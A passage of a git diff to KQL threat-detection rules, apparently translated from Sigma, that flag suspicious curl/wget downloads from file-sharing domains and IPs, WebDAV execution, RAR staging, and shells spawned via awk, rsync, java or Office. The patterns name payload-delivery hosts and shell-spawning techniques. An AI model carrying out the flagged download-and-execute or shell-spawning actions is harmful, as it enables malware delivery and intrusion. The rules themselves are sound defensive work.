ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql index d47202af..38705676 100644 --- a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql +++ b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Download From File Sharing Domain Via Wget.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-05 -// Level: high -// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Suspicious File Download From File Sharing Domain Via Wget.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: high +// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql index 1bfaf062..02a5cd5d 100644 --- a/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql +++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Download From IP Via Curl.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-27 -// Level: high -// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Suspicious File Download From IP Via Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: high +// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql index a1aa333b..5680ffe4 100644 --- a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql +++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Download From IP Via Wget.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-27 -// Level: high -// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Suspicious File Download From IP Via Wget.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: high +// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql index d11c2d3e..c3745c13 100644 --- a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql +++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Download From IP Via Wget.EXE - Paths -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-02-23 -// Level: high -// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Suspicious File Download From IP Via Wget.EXE - Paths +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql b/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql index 97f6799a..4847028b 100644 --- a/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql +++ b/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Execution From Internet Hosted WebDav Share -// Author: pH-T (Nextron Systems) -// Date: 2022-09-01 -// Level: high -// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Suspicious File Execution From Internet Hosted WebDav Share +// Author: pH-T (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql b/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql index 6f4199fb..4731076f 100644 --- a/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql +++ b/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Greedy Compression Using Rar.EXE -// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022-12-15 -// Level: high -// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Suspicious Greedy Compression Using Rar.EXE +// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-12-15 +// Level: high +// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_installer_package_child_process.kql b/KQL/rules/Execution/suspicious_installer_package_child_process.kql index 760de8a1..926df4fa 100644 --- a/KQL/rules/Execution/suspicious_installer_package_child_process.kql +++ b/KQL/rules/Execution/suspicious_installer_package_child_process.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Installer Package Child Process -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-02-18 -// Level: medium -// Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters -// MITRE Tactic: Execution -// Tags: attack.t1059, attack.t1059.007, attack.t1071, attack.t1071.001, attack.execution, attack.command-and-control -// False Positives: -// - Legitimate software uses the scripts (preinstall, postinstall) - -DeviceProcessEvents +// Title: Suspicious Installer Package Child Process +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-02-18 +// Level: medium +// Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters +// MITRE Tactic: Execution +// Tags: attack.t1059, attack.t1059.007, attack.t1071, attack.t1071.001, attack.execution, attack.command-and-control +// False Positives: +// - Legitimate software uses the scripts (preinstall, postinstall) + +DeviceProcessEvents | where (ProcessCommandLine contains "preinstall" or ProcessCommandLine contains "postinstall") and (FolderPath endswith "/sh" or FolderPath endswith "/bash" or FolderPath endswith "/dash" or FolderPath endswith "/python" or FolderPath endswith "/ruby" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/javascript" or FolderPath endswith "/osascript" or FolderPath endswith "/tclsh" or FolderPath endswith "/curl" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath endswith "/package_script_service" or InitiatingProcessFolderPath endswith "/installer") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql b/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql index 53894525..723776e6 100644 --- a/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql +++ b/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Interactive PowerShell as SYSTEM -// Author: Florian Roth (Nextron Systems) -// Date: 2021-12-07 -// Level: high -// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Administrative activity -// - PowerShell scripts running as SYSTEM user - -DeviceFileEvents +// Title: Suspicious Interactive PowerShell as SYSTEM +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-07 +// Level: high +// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Administrative activity +// - PowerShell scripts running as SYSTEM user + +DeviceFileEvents | where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql index 7806dd0d..b531df6b 100644 --- a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql +++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql @@ -1,11 +1,11 @@ -// Title: Suspicious Invocation of Shell via AWK - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-09-02 -// Level: high -// Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. -// This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Suspicious Invocation of Shell via AWK - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. +// This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains "BEGIN {system" and (FolderPath endswith "/awk" or FolderPath endswith "/gawk" or FolderPath endswith "/mawk" or FolderPath endswith "/nawk")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql index 063c5e3f..790c440a 100644 --- a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql +++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Invocation of Shell via Rsync -// Author: Florian Roth -// Date: 2025-01-18 -// Level: high -// Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.t1203 - -DeviceProcessEvents +// Title: Suspicious Invocation of Shell via Rsync +// Author: Florian Roth +// Date: 2025-01-18 +// Level: high +// Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.t1203 + +DeviceProcessEvents | where ((FolderPath endswith "/ash" or FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath endswith "/rsync" or InitiatingProcessFolderPath endswith "/rsyncd")) and (not(ProcessCommandLine contains " -e ")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_java_children_processes.kql b/KQL/rules/Execution/suspicious_java_children_processes.kql index b8db8b0d..9297fe2c 100644 --- a/KQL/rules/Execution/suspicious_java_children_processes.kql +++ b/KQL/rules/Execution/suspicious_java_children_processes.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Java Children Processes -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-03 -// Level: high -// Description: Detects java process spawning suspicious children -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Suspicious Java Children Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-03 +// Level: high +// Description: Detects java process spawning suspicious children +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql b/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql index 79d8a015..a29c8335 100644 --- a/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql +++ b/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Microsoft Office Child Process - MacOS -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-01-31 -// Level: high -// Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.t1059.002, attack.t1137.002, attack.t1204.002 - -DeviceProcessEvents +// Title: Suspicious Microsoft Office Child Process - MacOS +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.t1059.002, attack.t1137.002, attack.t1204.002 + +DeviceProcessEvents | where (FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osacompile" or FolderPath endswith "/osascript" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/python" or FolderPath endswith "/python3" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath contains "Microsoft Word" or InitiatingProcessFolderPath contains "Microsoft Excel" or InitiatingProcessFolderPath contains "Microsoft PowerPoint" or InitiatingProcessFolderPath contains "Microsoft OneNote") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql b/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql index 9c19282b..a3092b25 100644 --- a/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql +++ b/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Mshta.EXE Execution Patterns -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-07-17 -// Level: high -// Description: Detects suspicious mshta process execution patterns -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1106 - -DeviceProcessEvents +// Title: Suspicious Mshta.EXE Execution Patterns +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-07-17 +// Level: high +// Description: Detects suspicious mshta process execution patterns +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1106 + +DeviceProcessEvents | where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta"))))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_nohup_execution.kql b/KQL/rules/Execution/suspicious_nohup_execution.kql index 54098102..8d84b7b3 100644 --- a/KQL/rules/Execution/suspicious_nohup_execution.kql +++ b/KQL/rules/Execution/suspicious_nohup_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Nohup Execution -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: high -// Description: Detects execution of binaries located in potentially suspicious locations via "nohup" -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Suspicious Nohup Execution +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: high +// Description: Detects execution of binaries located in potentially suspicious locations via "nohup" +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/nohup" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_outlook_child_process.kql b/KQL/rules/Execution/suspicious_outlook_child_process.kql index cb6d6729..8a7a7cf6 100644 --- a/KQL/rules/Execution/suspicious_outlook_child_process.kql +++ b/KQL/rules/Execution/suspicious_outlook_child_process.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Outlook Child Process -// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team -// Date: 2022-02-28 -// Level: high -// Description: Detects a suspicious process spawning from an Outlook process. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 - -DeviceProcessEvents +// Title: Suspicious Outlook Child Process +// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team +// 